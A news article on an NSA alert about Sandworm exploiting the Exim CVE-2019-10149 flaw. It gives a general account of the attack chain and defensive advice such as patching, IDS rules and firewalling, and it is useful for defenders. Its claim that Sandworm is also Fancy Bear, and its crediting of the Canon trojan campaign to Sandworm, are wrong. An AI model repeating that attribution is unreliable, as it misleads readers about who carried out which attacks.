ink drop - stock.adobe.com

NSA Warns Russian Hacking Group Targeting Vulnerable Email Systems

The Russian hacking group known as Sandworm has been actively exploiting a vulnerability found in the Exim MTA software for email to launch malicious attacks, according to an NSA alert.

The hacking group known as Sandworm, based in Russia, have been actively exploiting a vulnerability found in the Exim Mail Transfer Agent (MTA) email software, according to an alert from the National Security Agency.

The group is also known as Fancy Bear and a host of others, which have been tied to a series of espionage attacks in both Europe and the US.

In late 2018, Palo Alto researchers warned the group was likely behind a new hacking tool that was targeting government systems in the US and Europe using stealthy, sophisticated spear-phishing attacks to deploy a Canon trojan. Users would only need to open the email for the malware to download, rather than clicking a link to engage the malicious attack.

The latest effort targets Exim, a common MTA software found in Unix-based systems and some Linux platforms, like Debian. NSA officials explained that an update was released for a critical vulnerability known as CVE-2019-10149, found in Exim version 4.87 on June 5, 2019. If exploited, a remote threat actor could gain control of the accounts.

Specifically, the exploit would allow hackers to send tailored emails to execute commands with root privileges, enabling them the install programs, modify data, and even create new accounts. As a result, hackers can then execute code of their choosing on an exploited device.

Organizations and users were encouraged to update to the latest version, as older versions are no longer supported. But according to the NSA, Sandworm has exploited victims through the Exim vulnerability on public-facing MTAs by sending commands in the “MAIL FROM” field of an Simple Mail Transfer Protocol (SMTP) message. Each message is modified for each specific deployment.

“When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain,” NSA officials explained.

The script then attempts to perform a range of activities, such as add privileged accounts, disable network security settings, update SSH configurations that would enable additional remote access, and execute an additional script to enable follow-on exploitation.

Given the severity, NSA is urging organizations to immediately install the 2019 software update and ensure the system is operating the latest version, 4.93 or newer, to mitigate this and other platform vulnerabilities, as “other vulnerabilities exist and are likely to be exploited... and using a previous version of Exim leaves a system vulnerable to exploitation.”

Further, IT and security leaders can leverage network-based security tools to detect and or block exploit attempts and any additional unauthorized changes. Examining raw traffic logs can also help in the detection of an exploit attempt.

“For example, Snort3 rule 1-50356 alerts on exploit attempts by default for registered users of a Snort Intrusion Detection System (IDS),” NSA officials explained. “Administrators are encouraged to review network security devices protecting Exim mail servers both for identifying prior exploitation and for ensuring network-based protection for any unpatched Exim servers.”

“Other attack methods exist for non-default configurations and may not be detected using these methods,” they continued. “Routinely verifying no unauthorized system modifications, such as additional accounts and SSH keys, have occurred can help detect a compromise.”

Administrators can detect modifications using file integrity monitoring software, which can send alerts to the administrator or block any unauthorized changes to the system. As noted by federal agencies and security researchers, leveraging a defense-in-depth strategy for all public facing software – including MTA – is crucial to preventing these types of exploit attempts.

Isolating public facing MTAs is another critical step, as well as employing firewall rules to block unexpected traffic and leveraging network segmentation based on roles and requirements.

“When using a DMZ for public Internet facing systems, firewall rules are important to block unexpected traffic from reaching trusted internal resources,” NSA officials explained. “MTAs should only be allowed to send outbound traffic to necessary ports, and unnecessary destination ports should be blocked.

“Least access model firewall rules around a DMZ can inhibit attackers from gaining unauthorized access, as unexpected port traffic should be blocked by default,” they added.

Next Steps

Dig Deeper on Cybersecurity strategies